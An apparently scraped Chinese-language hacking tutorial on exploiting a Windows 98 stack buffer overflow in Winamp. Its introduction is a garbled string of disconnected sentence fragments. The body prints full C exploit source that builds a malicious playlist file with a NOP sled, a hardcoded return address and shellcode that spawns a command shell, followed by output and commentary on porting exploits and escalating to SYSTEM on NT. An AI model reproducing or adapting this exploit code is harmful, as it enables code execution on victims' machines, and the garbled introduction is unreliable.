【導讀】我們的目的是研究如何利用。windows程序的堆棧溢出漏洞。讓我們從頭開始。name數(shù)組沒有作邊界檢查。堆棧中的返回地址。程序執(zhí)行了非法操作。。。這個功能太好了，我們。定存放返回地址的偏移位置。<未知>中導致無效頁錯誤。處，是ret的地址。組輸入我們精心編寫的shellcode。串的地址40就可以了。通過上面的stackdump我們可以看到，系統(tǒng)，其他運行進程保持不變的情況下。突檢測，出錯時寄存器影像和堆棧影像，精確的方便的尋找堆棧溢出漏洞。OK，萬事具備，只差shellcode了。顯然，根據(jù)以往的經驗，我們想開。們就可以作很多事情。這個程序有必要詳細解釋一下。那樣使用系統(tǒng)調用來實現(xiàn)關鍵函數(shù)。鏈接庫來提供系統(tǒng)函數(shù)。候，并不能直接引用他。加載都是從這個基本地址加載。system函數(shù)位于的一個

　　

【正文】 see my advisory. * * Tested with Winamp using Windows98 on an Intel * PII 400 with 128MB RAM * * * modify by ipxodi 20012k * for windows98 the 2nd version and for a new shellcode. * windows98 v chinese version * pII 366 with 64MB RAM(Not a good PC,en?） * */ include int main() { char buffer[640]。 char eip[8] = \xa3\x95\xf7\xbf。 char sploit[256] = \x55\x8B\xEC\x33\xC0\x50\x50\x50\xC6\x45\xF4\x4D\xC6\x45\xF5\x53 \xC6\x45\xF6\x56\xC6\x45\xF7\x43\xC6\x45\xF8\x52\xC6\x45\xF9\x54\xC6\x45\xFA\x2E\xC6 \x45\xFB\x44\xC6\x45\xFC\x4C\xC6\x45\xFD\x4C\xBA\x50\x77\xF7\xbF\x52\x8D\x45\xF4\x50 \xFF\x55\xF0 \x55\x8B\xEC\x83\xEC\x2C\xB8\x63\x6F\x6D\x6D\x89\x45\xF4\xB8\x61\x6E\x64\x2E \x89\x45\xF8\xB8\x63\x6F\x6D\x22\x89\x45\xFC\x33\xD2\x88\x55\xFF\x8D\x45\xF4 \x50\xB8\xFF\xFF\xFF\xFF\x2d\xdB\x67\xFe\x87\xFF\xD0 \x55\x8B\xEC\xBA\xFF\xFF\xFF\xFF\x81\xEA\xFB\xAA\xFF\x87\x52\x33\xC0\x50\xFF\x55\xFC。 FILE *file。 for(int x=0。x580。x++) { buffer[x] = 0x90。 } buffer[x]=0。 file = fopen(,wb)。 fprintf(file, [playlist]\n)。 fprintf(file, File1=)。 fprintf(file, %s, buffer)。 fprintf(file, %s, eip)。 fprintf(file, %s, sploit)。 fprintf(file, \nNumberOfEntries=1)。 fclose(file)。 printf(\t created file loaded with the exploit.\n)。 return 0。 } OK，運行他，生成一個文件叫做 winamp 里面打開這個playlist, 結果如下，我可愛的 dos出來了： Microsoft(R) Windows 98 (C)Copyright Microsoft Corp 19811999. D:\hacker\document\ipxodidir ......................... ........就不貼了 ......... 總結： 經過這次實戰(zhàn)的演練，大家一定對windows 下的 buffer overflow有了很深的掌握了。我們可以看到， windows 下的堆棧溢出攻擊和 unix下的，原理基本相同。但是，由于 windows 用戶進程地址空間分配和堆棧處理有其獨立的特點，導致了 windows 環(huán)境下堆棧溢出攻擊時，使用的堆棧溢出字符串，與 unix下的，區(qū)別很大。這也是我在寫完 linux下的堆棧溢出系列之后，另外寫windows 系列的原因。 另外，大家從破解的過程中，可以發(fā)現(xiàn)我一再強調 windows 的版本。事實上，這也導致了 windows下的 exploit不具有通用性。大家的 windows 版本不一，而exploit 使用了很多動態(tài)鏈接庫里面的庫函數(shù)，其地址都是與 dll 的版本有關系的。不同的 dll版本，里面的庫函數(shù)的偏移地址就可能（注意：是可能）不同。因為 windows 的 patch 天天有，他的一些 dll就更新很快。甚至可能不同語言版本的 windows，其核心 dll的版本都不同。用戶的 dll一變更，那么，我們的 exploit里面的 shellcode就要重新寫。 為了解決這個問題，我想我們可以盡量減少固定地址的使用。即使用GetProcAddress 來獲得我們將使用的每一個系統(tǒng)函數(shù)，當然這就大大加長了我們的 shellcode。但是，這也無法消除對 LoadLibrary和 GetProcAddress 的地址的直接引用，因為這兩個是 shellcode中最基本的函數(shù)，自然就導致了對 版本的依賴。 這里奉勸大家，當你寫的 exploit發(fā)生無效頁錯誤時，不要灰心。運行 sice，跟蹤你的 shellcode，會發(fā)現(xiàn)問題的根源的。 因此，這也回答了去年 xsz,littleworm 它們的問題。當時我們實驗 的exploit總是沒有成功， client端執(zhí)行完了以后 server 端我們經?？吹?access violation的框，就是因為 shellcode的版本依賴 問題導致的。 所以，對于 windows 下的堆棧溢出exploit，必須公開原代碼，才能由其他人完成別的版本的修改，這一點，大家以后公布 exploit時，要記住。 說一句題外話： 很多人運行了堆棧溢出 exploit以后沒有成功，就認為自己的機器沒有毛病。對此， dark spyrit AKA Barnaby Jack 曾有這樣的建議： If the exploit failed...... Do not determine the threat to your servers solely on the results of one public exploit the vulnerability exists, fix it. If you think that was the only demonstration code floating around you need your head examined. 以前咱們水木黑客版 97 年堆棧溢出大討論的時候， rainer 就很高水平的探討過 windows 下的 buffer overflow。他的文章現(xiàn)在還在，大家可以去精華區(qū)看看。不過當時只是探討原理，還停留在堆 棧溢出的可行性，遠沒有探討利用他來攻擊。我也曾經以為 windows 的堆棧溢出攻擊是不必要的。 后來， NT的中普通用戶獲取 admin，我想到過仿照 UNIX，搞緩沖區(qū)溢出攻擊。因為 NT 里面有很多系統(tǒng)進程，都是以system 賬號啟動的。如果我們可以將它們 overflow，按照上面的方法，可以得到 dos，（ NT 下是 ），將擁有超級用戶的權限。當然可以為所欲為了。 這只是 windows NT 下堆棧溢出攻擊的一個應用。去年，我研究 的溢出之后，發(fā)現(xiàn)帶有問題的 windows 網絡服務程序導致了 windows 堆棧溢出，可以幫助我們獲得遠程控制。才認識到windows 堆棧溢出攻擊將是一個很有研究價值的攻擊手段。 在后續(xù)的研究中，有時候因為困難幾乎要放棄。好在有小懶蟲 (sysword)，小四(hellguard)，康師傅 (kxn)這些網友給我的督促和幫助。在此感謝，同時感謝以前一起討論過 windows 系列堆棧溢出的朋友 littleworm,xsz它們。 最后，我希望我的講座作為拋磚引玉，能夠引發(fā)大家更深入的探討。希望大家在看了之后，能夠對 windows 堆棧溢出技術有一定了了解。如果大家能夠提出改進的算法，或者 發(fā)現(xiàn)新的 exploit，就真正是光大了我們黑客版的精神。 讓我們以下面這句話共勉： If you assume that there39。s no hope, you guarantee there will be no hope. If you assume that there is an instinct for freedom, there are opportunities to change things. Noam Chomsky 本篇文章來源于 新世紀網安基地 () 原 文 出 處 ：00810/